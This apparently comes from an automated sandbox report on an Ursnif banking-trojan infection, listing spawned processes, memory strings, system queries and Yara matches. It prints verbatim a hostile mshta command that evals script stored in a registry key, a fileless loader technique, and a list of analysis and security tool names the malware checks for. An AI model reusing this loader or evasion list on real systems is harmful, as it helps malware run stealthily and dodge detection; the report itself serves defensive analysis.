Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000002.686207341.0000000005B00000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: NProgram Manager
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.673991898.00000000009D8000.00000004.00000020.sdmp Binary or memory string: Progman;C:$y
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\control.exe Code function: 37_2_00562F90 CreateMutexExA,GetUserNameA, 37_2_00562F90
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY